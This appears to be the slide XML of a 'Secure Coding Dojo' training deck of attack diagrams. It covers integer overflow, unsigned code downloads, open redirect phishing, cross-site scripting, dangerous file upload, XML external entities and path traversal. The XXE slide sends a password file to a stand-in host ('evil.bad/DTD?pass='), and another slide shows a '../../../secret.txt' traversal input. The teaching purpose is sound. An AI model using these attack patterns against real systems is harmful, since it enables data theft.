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5" r:id="rId2"/>
    <p:sldId id="27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1"/>
    <p:restoredTop sz="94716"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="47" d="100"/>
          <a:sy n="47" d="100"/>
        </p:scale>
        <p:origin x="3920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E20F-6E48-014D-9280-06447CBB8C9A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AD91-72FD-DF43-ADB4-7A15AC909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F34-425A-5C44-8C98-21EE88C6F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7F6B5-E67A-0C47-AE92-09F33931C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EACD1-330F-B84E-82FF-8E88677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41D5-5173-A044-922B-E7F59723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D6C3-EA7C-E54E-8601-39B1CB18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9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2F0-1085-B146-AE9E-D535973F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50C3-6E14-C84C-B877-FF747960B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806-FAB4-6140-8B53-445EFC88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D787-5EF2-1648-8E33-EF35A8ED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BF03-C058-8444-89B6-04F2BFDF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6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AADBF-91DC-1E48-9AC4-33BCB4E7B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97193-898B-9E4C-9ED2-8B39E09DA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052F9-58A0-0D44-91B7-B5D48C43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7441-2128-8D41-93E3-0206FE9A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FBB2-8760-F445-9675-D458CD8E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7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22B3-6B61-A345-B1D0-1BD04992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DD01-F40F-014A-9F5B-E1DFF08F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8258-CAEF-D04A-8A03-6C7E0069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B86E-4215-9140-B476-018881B5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96B47-A7D8-7A49-9740-B96369F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13EF-7C4B-7A4F-A27B-EA8FB1CA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E67D5-5402-5C42-A600-0018C127C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AA098-3918-A144-BBA7-4D1FDB21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4D96-16B3-404B-BD77-B75A7F60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1AD87-4D3A-244B-B620-C7FE3CEB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ADF6-0FBB-EC49-B510-A4EFFDC6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FEF4-D389-EF4D-9993-A7A9B2295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6FC6-2FBD-3240-8F63-8032D54A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B7037-9F6E-BE49-981F-6F497F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924A2-83BC-6140-BDD3-B410C1FE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C0516-6302-E145-A87F-E365DC80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4B2-AE4B-AD49-BA00-95687C8F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45900-780C-1148-A32A-6CF7F242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61063-52B1-1D46-A598-2A1C3E242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2C714-B645-4C4B-B3D9-1F95C82E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A6D75-3241-6044-90D2-6845DBE01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CA102-24EE-F04D-9883-DD24954F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DCD3-3801-DF49-A288-1BEA5851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02F1F-1BCB-2A4F-823B-6C51C17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46B2-6110-FC44-985A-B8C3231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DA805-BD42-1C4C-B765-3056E216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B1C2A-2A3A-5A4E-A457-5C13F34D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3D7B-03D2-CE4A-B40C-ED3690EC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1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636D3-5070-C344-99AB-41D8125A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B3E04-3CC9-5149-B7C3-411924F2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A40EF-9422-8645-9F86-946DC67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69B4-8045-264E-B4FF-A4458E1A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A726-9B22-1B4E-9F87-433AA894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4DB9E-EB62-0B49-B373-64DE96DF9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2293C-91DF-8249-8FC1-0237232A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4E245-EAF3-1D4E-974E-4C2ED7B2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9EDE-E930-D540-AB01-D804974F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AE44-23CB-364C-BF9C-2C233025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01180-CDE3-AD4D-B178-E1C33C96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1DE6B-794E-5342-B468-7EAADDD00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FD2A-4531-F748-B059-4F05459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4E80B-E8A1-554A-9B1A-34FA1136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0453C-E221-5446-AF8B-D5FAB0CA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75F8B-5233-A548-A638-4DFBB739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8971A-2C99-F14A-8477-E9CC9340C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059DA-5403-DD4B-9D9F-D51EB59C1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E6ED-51E7-FE45-B148-749F50E666F9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C8C4-B701-F446-9D5C-6CAB9A10B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90B8-5391-C147-BC4B-F0498277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1.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24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3.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24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9.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.sv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12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45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44.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.sv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3.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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0.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28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27.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48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3396E-1E9A-E24B-A722-EB952825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8C836-1711-224B-AED4-4C117B32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7" y="678275"/>
            <a:ext cx="10515600" cy="214634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&lt;Secure Coding Dojo/&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6600" b="1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600" b="1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Attack-Grams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A6A5AE-310D-634A-A277-FBF435420AE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750517" y="3247373"/>
            <a:ext cx="11105368" cy="127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alpha val="58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simple diagrams describing various attacks that leverage software flaws</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57813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40D4-37ED-434B-B4DA-FB641A49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511" y="484179"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer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5A244-D130-744F-B4E8-C1CD4C98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3661870" y="1646559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44B1A-9DB9-B24C-91B6-2D3803F7C2B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3592977" y="251939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0E9722-3BD4-6545-8B5E-E3CAFDA1B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153" y="1606727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8C35F-DF7E-AF48-83E5-8546A687AB35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901951" y="2530923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92179-92D7-6644-AC31-51BCECF7819A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278391" y="2852184"/>
            <a:ext cx="8744" cy="3191971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176AA-094B-F244-B97D-1FBFB393545B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3909086" y="2854903"/>
            <a:ext cx="8745" cy="318925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875C25-21CD-AC40-9111-CF4E82AD3D28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278391" y="3234228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58890C-67DD-1643-A349-C9C13E2409BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2394407" y="290448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  <a:endParaRPr lang="en-US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586E9-D527-0C40-AFDA-BEFC94FC93EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1270136" y="3248765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4E3D0-7267-8044-B04A-CF20ED52244E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20570414">
            <a:off x="1254250" y="3517724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A466A-C7AF-0042-A900-23DFAA052A09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1271139" y="4127355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F86957-8B5C-D54E-AED0-6EC770AAC8AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2394407" y="38009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7D1613-AB66-864E-AB5C-0D75CA3F089D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1269647" y="4158246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45333-CE45-3A4F-8D50-4ED27F2575E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20563066">
            <a:off x="1254048" y="4420153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1FA10-4CEB-CE4D-BEF1-E8A47358EB71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2392248" y="2512435"/>
            <a:ext cx="37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EFBA92-A614-0E42-A65B-61A6DD093CF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1287136" y="5035245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B38CB2-A7DD-BD42-B4CA-FB63B60ADB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2394407" y="46983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5BD8F-F798-F449-A53C-628201CF1B72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1269647" y="5080681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A6FF4D-F96F-1E46-BA81-19B3E796AF71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20638428">
            <a:off x="1219713" y="5280093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2657D0-7C0E-3F4F-AEA0-3294BE280A17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4084023" y="3942689"/>
            <a:ext cx="357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Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ttempts = 32767 (MAX_SHORT)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4DB7A3-2970-7048-A400-E71BD3F0E437}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4084023" y="4850579"/>
            <a:ext cx="427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A94442"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A94442"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ttempts = -32768 (&lt; MAX_ATTEMPTS)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077D48-CBC1-E243-B376-9523BB2C404E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4117524" y="3054395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i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>attempts = 32766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8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>
            <a:off x="2116212" y="2159140"/>
            <a:ext cx="12700" cy="3012165"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 26443299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59092"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download of Code Without </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integrity Check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1245654" y="1602634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555739" y="1881409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3398690" y="275424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836" y="3188972"/>
            <a:ext cx="9525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3405904" y="5325849"/>
            <a:ext cx="101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979584" y="2939980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5377739" y="3300489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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23655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6895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Redirect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4230441" y="1460277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15106" y="2275091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3840168" y="2330822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441" y="3651660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410453" y="3469666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181420" y="46041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1475993" y="3055134"/>
            <a:ext cx="825243" cy="3823"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3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 flipV="1">
            <a:off x="2699979" y="1113961"/>
            <a:ext cx="721008" cy="2339915"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -31706"/>
              <a:gd name="adj2" fmla="val 70843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rot="10800000" flipV="1">
            <a:off x="2698393" y="4127910"/>
            <a:ext cx="1532049" cy="133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3001873" y="4183641"/>
            <a:ext cx="10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Phishing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E-mail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868551A-88CA-5C44-A00B-37F539298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2637" y="3595929"/>
            <a:ext cx="531981" cy="5319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58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C997FDC-BF7F-2D43-9D94-DADC0687A70A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="1"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3121919" y="2851625"/>
            <a:ext cx="851348" cy="1600363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228418" y="1512458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48" y="52335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Scripting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3192325" y="122846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852" y="445065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2310230" y="426865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956831" y="5403153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4" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4212781" y="3181332"/>
            <a:ext cx="1599027" cy="93961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6F328B50-780E-0843-A476-174A2D6C5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50875" r="83807"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3973267" y="2496949"/>
            <a:ext cx="569219" cy="709353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8" idx="1"/>
            <a:endCxn id="54" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1592178" y="2487669"/>
            <a:ext cx="718053" cy="225724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1742384" y="351515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14F5F5-9385-3342-8603-31907DBE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232948" y="1561394"/>
            <a:ext cx="718457" cy="9262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76AE792-A9B2-5946-A45D-EE0E0BE3BA27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1224005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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194682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069219" y="1383243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51" y="3614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921706" y="1038954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6322" y="4321438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151031" y="4139444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386322" y="52337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35" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="3143807" y="2602673"/>
            <a:ext cx="1962985" cy="147454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3" t="-154" r="83694" b="49654"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2814741" y="1993850"/>
            <a:ext cx="573285" cy="729206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438970" y="4797688"/>
            <a:ext cx="1947352" cy="1336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3149397" y="4431028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2BEC85-774B-3347-B2BC-7565B568A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</a:blip>
          <a:srcRect l="80810" t="32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5540358" y="1383240"/>
            <a:ext cx="1605449" cy="1950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64719A-1C4D-C042-8435-1D7D1D917F79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5540358" y="106808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www.bank.com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D3783DA-F065-D745-88CF-80E8E48CAF58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="35" idx="1"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1962721" y="2358452"/>
            <a:ext cx="852021" cy="1964321"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/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F12ECAE-B3A7-D045-9F7F-C3B59C3FA083}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="22" idx="1"/>
            <a:endCxn id="7" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3674668" y="2358451"/>
            <a:ext cx="1865690" cy="3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308CD-0267-C64A-9687-466A758F4132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3823733" y="1959988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/transferMoney</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322522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be 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1172C724-7D07-B14A-89BC-78850957D25E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2804246" y="1536188"/>
            <a:ext cx="1300442" cy="1924642"/>
          </a:xfrm>
          <a:prstGeom prst="cub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26" y="61509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Upload of Dangerous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530386" y="1182176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www.file.server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242" y="431649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583179" y="413449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045221" y="525009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0E4836-B7A8-F74B-A87F-DB491B7EBA63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="1"/>
            <a:endCxn id="35" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3218530" y="2899589"/>
            <a:ext cx="875713" cy="1893155"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 126104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104" t="53205" r="16432" b="-2165"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3218529" y="2521181"/>
            <a:ext cx="619535" cy="7568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3206557" y="3516135"/>
            <a:ext cx="113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Web Script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2E84624-11C3-934C-A438-3C57C7779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250" t="49342" r="67319" b="229"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3001343" y="1847106"/>
            <a:ext cx="510868" cy="644075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6F4AA0E-AED1-334D-AD3A-CF28E87A322D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18" idx="0"/>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="1547709" y="2680865"/>
            <a:ext cx="1965355" cy="941914"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2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D149F53-C264-AA41-9725-BD5C4D468EB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1332955" y="2136405"/>
            <a:ext cx="151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Confidential Docs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E17861D-E57E-7E45-AA04-7C96B7117C7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="26" idx="4"/>
            <a:endCxn id="17" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3779578" y="2661064"/>
            <a:ext cx="790914" cy="1655429"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2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0CCDA086-16BD-664F-8724-43B5B3A56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4376183" y="2963824"/>
            <a:ext cx="232401" cy="2929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B325088-1CBE-1845-9F83-5B69ACCC4E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4608584" y="3684801"/>
            <a:ext cx="232401" cy="29299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B2DD4FC-000F-EF40-A39A-37EBDD8572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2011545" y="3525022"/>
            <a:ext cx="232401" cy="292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21835DC-FD13-8D43-B42D-06E747C428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50" t="49342" r="67319" b="229"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2217520" y="2794475"/>
            <a:ext cx="232401" cy="2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0020F74-88C1-7A49-92E4-1BFFF00ABA1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2643659" y="2501704"/>
            <a:ext cx="4254567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alpha val="23000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt; /&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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BA5DEC-E4C6-BB41-A0C5-EE55ACA66A8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2805540" y="3013881"/>
            <a:ext cx="3994760" cy="2324995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500" y="44325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XML External Entities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E6602-51D7-D744-84FA-B7F8376BC76E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1645713" y="4703914"/>
            <a:ext cx="1050542" cy="1322377"/>
            <a:chOff x="3150422" y="3824239"/>
            <a:chExt cx="1050542" cy="132237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9443" y="3824239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150422" y="477728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1354238" y="2352505"/>
            <a:ext cx="162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Processor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7E0E9B-145B-304A-99DD-4F1890294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32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811756" y="1484146"/>
            <a:ext cx="718457" cy="8728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6D0F05-8CA4-6D41-A5DF-7EEB71B7FAF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2932423" y="3267838"/>
            <a:ext cx="3740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/app/password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as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Link to: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http://www.evil.bad/DTD?pass=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720C6B7-02D6-CC4E-963C-7204DDE57B2B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 flipV="1">
            <a:off x="2530213" y="1917740"/>
            <a:ext cx="2454140" cy="2825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7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7780A6-765F-BC47-8367-DA53B3812228}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2486372" y="1460401"/>
            <a:ext cx="329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/DTD?pass=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jmttN9YC4bK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22D28A-5BB9-AA43-A6E6-CE1AF4C2F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61896" r="2089" b="6904"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4984353" y="1454602"/>
            <a:ext cx="718457" cy="9262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9F02034-A0C5-5F43-9C21-1A6632715CC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4589605" y="2412181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77D7AAA-998C-B84E-BA76-876A713DC084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rot="16200000" flipV="1">
            <a:off x="1178158" y="3711088"/>
            <a:ext cx="1982077" cy="357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49E351-925A-4440-9813-8391BA3566AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4005117" y="5338876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 Document</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="51543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FE33E449-6A50-C940-ADC5-25A3B97CA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567765" y="2197851"/>
            <a:ext cx="349049" cy="450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382395" y="1672003"/>
            <a:ext cx="875012" cy="106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80" y="79003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Path Traversal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4173095" y="1807489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3026049" y="4256853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4CA301-D0DB-954F-8811-F42C5E388242}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1228580" y="4514012"/>
            <a:ext cx="1050542" cy="1270957"/>
            <a:chOff x="1228580" y="4514012"/>
            <a:chExt cx="1050542" cy="127095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1228580" y="5415637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C361591-A5FB-B349-BCAF-FF8BE597FD8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97137" y="2684971"/>
            <a:ext cx="1585755" cy="207232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21EC77-1618-5043-AEE2-5DBDF80E9CB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081458" y="3427124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../../../secret.txt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D2E1C-5E9C-E341-8301-F960DFDDA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5589" y="2315364"/>
            <a:ext cx="456525" cy="456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7A6AA06-C655-4F43-9E99-C420AE565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69652" y="2015208"/>
            <a:ext cx="913049" cy="91304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58E9429-3307-B84C-A2B5-BA0BBB18BD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8921" y="2167171"/>
            <a:ext cx="710294" cy="7102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EE43077-F31A-BC47-BC8E-C07B19591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0602" y="2269583"/>
            <a:ext cx="584732" cy="584732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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CC8D0D6-51D9-8245-9D49-9311AC3872D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16200000" flipH="1">
            <a:off x="3075994" y="3678439"/>
            <a:ext cx="1511926" cy="11561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1B38DB61-E807-4441-BEA6-FA5D51C04340}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="50" idx="0"/>
            <a:endCxn id="14" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3039579" y="2141660"/>
            <a:ext cx="761086" cy="812109"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -30036"/>
